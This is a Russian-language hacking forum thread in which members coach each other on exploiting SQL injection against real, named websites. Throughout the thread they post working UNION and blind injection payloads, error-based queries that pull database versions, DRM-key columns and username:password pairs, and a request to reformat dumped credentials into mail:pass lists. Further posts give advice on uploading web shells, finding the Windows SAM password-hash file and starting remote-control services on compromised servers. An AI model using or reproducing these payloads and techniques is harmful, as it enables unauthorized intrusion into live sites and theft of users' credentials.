SELECT * FROM products WHERE category_id in (SQL) and hidden=0 ...

Можно просто сделать так:

Code:
1) and 1=2 UNION SELECT ...#

Советую обратиться к документации MySQL.


Что-то не получается вывести так версию БД

Покажи запрос полностью.

http://aqua-st.ru/catalog/102%20order%20by%201#

FlaktW said:
Что-то не получается вывести так версию БД
Покажи запрос полностью.
http://*******.ru/catalog/102%20order%20by%201#


http://*******.ru/catalog/102)and(0)=(1)union(select(1),2,3)#

Если твой браузер не отправляет в запросах символ '#', используй сниферы с возможностью изменения запросов на лету (в Charles - Ctrl+Shift+W, Rules, Type=Path, Match=^(.*)$, Replace=$1#)

Число столбцов подбирать придется вручную. Возможно, я ошибаюсь, но их не менее 999

upd:

Все-таки ошибся.

При правильном количестве столбцов ошибки в запросе


SELECT * FROM products WHERE category_id in ([SQLi]) and hidden=0 order by order_no


больше нет. Но она есть во втором запросе


SELECT distinct sizes FROM products WHERE hidden=0 AND category_id in ([SQLi]) ORDER BY sizes


Как видно из второго запроса, он вызовет ту же ошибку, поэтому софт пропустил правильное количество при прямом переборе.

Использовать union не получится. Только как слепую крутить.

Столбцов, как оказалось, 27.

102)and(1)=if(((select(count(*))from(information_s chema.columns)where(table_name=0x70726F6475637473) and(table_schema=database()))>26),1,0)#

true

102)and(1)=if(((select(count(*))from(information_s chema.columns)where(table_name=0x70726F6475637473) and(table_schema=database()))>27),1,0)#

false

# - %23

% - %25

Это надо запомнить, и не мучиться с Charles(В большинстве случаев).

XAMEHA said:
# - %23
% - %25
Это надо запомнить, и не мучиться с Charles(В большинстве случаев).


Че правда так можно? Не обманываешь?

Ты пример посмотри. Там не в параметрах инъекция.

Cherep said:
залил шелл на 1 сайт. Система, на которой стоит сайт, винда. Открыт порт для удаленного управления компьютером. Мб кто подскажет, где хранится пароль от учетки? Или есть какиенибудь другие варианты, для удаленного управления компом? Хотел попробывать радмин залить, но боюсь что будет блочить фаер. Заранее спасибо


Пароли от учетных записей в нынешних операционных системах не хранятся. Найти можно только hash пароля. Если тебе нужен hash пароля учетной записи то он в windows хранится в SAM файле. Тебе в system32.

R0nin said:
Пароли от учетных записей в нынешних операционных системах не хранятся. Найти можно только hash пароля. Если тебе нужен hash пароля учетной записи то он в windows хранится в SAM файле. Тебе в system32.


я второго юзера через батник сделал, но всёравно спасибо)

можно какнибудь запустить службу удаленного управления компьютером через встроеную в всо консоль?

Cherep said:
можно какнибудь запустить службу удаленного управления компьютером через встроеную в всо консоль?


ну если у тебя получилось запустить батник, почему бы и не запускать службы ?

net start "имя службы"

искал, гуглил, но не нашел мануала как рутать винду оО. Консолька в всо не канает. Мб кто подкинет мануальчик?

Ulitko said:
искал, гуглил, но не нашел мануала как рутать винду оО. Консолька в всо не канает. Мб кто подкинет мануальчик?


Не рутать, а получить права админа. Для этого есть эксплоиты, для начала посмотри это видео: https://forum.antichat.net/showpost.php?p=2770920&postcount=1

Народ) собсно такой вопрос...

Вообщем есть скуль с правами Y, но нет папки на запись... инклуда тоже нет = \

Вообщем то нарыл доступ по ssh к этому серверу.....

но права у юзера уг

у моего юзера например директория /home/myuser а сайт лежит в дириктории /home/siteuser/

Можно ли как то залить шелл в корень сайта?)

Порутать сервак не получится = \ т.к.

Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux

Есть какие нибудь варианты как залить шелл ?))

Можно ли как то залить шелл в корень сайта?)


Почему обязательно в корень сайта? Можно залить и скажем в images и другие подобные директории открытые на запись.. А потом, если необходимо, переместить шелл в корень...

Через SSH просмотри в /home/siteuser/ любую открытую на запись директорию, и лей, лей..

здравствуйте, нашел интересную иньекцию, судя по всему mssql.Если в данной форме


http://www.socketmobile.com/support/wifi/pw.asp


ввести кавычку, вылетает ошибка.Как такое можно раскрутить?

KUKLOVOD2, там не только эта бага)

но ссылку твою не получилось раскрутить

RexTiam said:
KUKLOVOD2, там не только эта бага)
но ссылку твою не получилось раскрутить


POST http://www.socketmobile.com/support/wifi/pw.asp

POSTDATA(вариант 1): Email=1')+UNION+SELECT+1,2,@@version,4--+&submit=Send+Registration+Key

POSTDATA(вариант 2):

Email=asd')+OR+1=@@version--+&submit=Send+Registration+Key

Result:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' to data type int.

значит все пытаюсь раскрутить эту скулю.Наблюдается интересное явление:при запросе


Email=1')+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFO RMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='View_DRM_Keys'+AN D+COLUMN_NAME+NOT+IN+('asscode ','assigndate','AssignedDate','assignedtype','assi gnusername','binary_message_body','cdkey','CDSeria lNum'))--+&submit=Send+Registration+Key


мы видим что существует колонка code в таблице View_DRM_Keys.Но когда делаем выборку:


Email=1')+or+1=(SELECT+TOP+1+code+from+View_DRM_Ke ys)--+&submit=Send+Registration+Key


видим следующее:Invalid column name 'code'.Почему так?

Потом поэксперементировав я обнаружил, что вытаскивая колонки из разных таблиц, вытакскиваются колонки с одними и теме же именами, хотя в данных таблицах они могут и не существовать.Что можно предпринять?

мб пишу не в правильную тему, но возникла такая проблема.

Сдампил бд mssql, там вот такой вид:


Code:
INSERT INTO tbl_xxx(id,password,accounttype,birthdate,BCodeTU, Email) VALUES ('login ','password ','0','Jan 01 1900 12:00AM','0','email');

как привести такие строчки к виду


Code:
mail;pass

???

сделай импорт базы, дальше возьми данные селектом, ну или спарси дамп))

Konqi said:
сделай импорт базы, дальше возьми данные селектом, ну или спарси дамп))


а как дамп спарсить?)))

Данные не могу вывести, ХЗ в чём дело:


Code:
-1+UNION+SELECT+1,2,3,group_concat(username,0x3a,pa ssword),5,6,7,8+FROM+calendar_users+LIMIT+1,1+--

После этого проведения нет никаких ошибок, обычная страница с текстом.

Что ещё можно сделать?

ЗЫ:


Code:
-1 UNION SELECT 1,2,3, COLUMN_NAME,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0xblablabla LIMIT 0,100 --

group_concat


и


LIMIT+1,1+--+


Жесть)

попробуй concat_ws(username,0x3a,password)

попробуй concat_ws


Без изменений.

and 1=0 ...count(*)...concat... limit 0,1

Code:
and 1=0 ... limit 0,1

Не меняется ничего и не выдаёт...

Komyak said:

Code:
and 1=0 ... limit 0,1

Не меняется ничего и не выдаёт...


Возможно вывод выпал в сорцы или в колонках пусто, либо данные начинаются не с первого поля. Попробуй ещё вывести без конкатенации.

На Limit не распространяется значение первого поля.

Komyak, в предыдущем сообщение я же вам написал показать count(*).

Code:
+and+1=0+union+select+1,CONCAT(CONCAT(count(*),use rname,CONCAT(count(*),password))),3,4,5,6,7,8+from +calendar_users limit+0,1--

Вывод делает:


4


и все, больше ничего не получается извлечь.

Здравствуйте.

Подскажите как раскручивать такую SQL inj

http://www.vesti-moscow.ru/rnews.html?id=100114+order+by+13--

Но когда ввожу

http://www.vesti-moscow.ru/rnews.html?id=100114+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13--

Ошибка! 0_о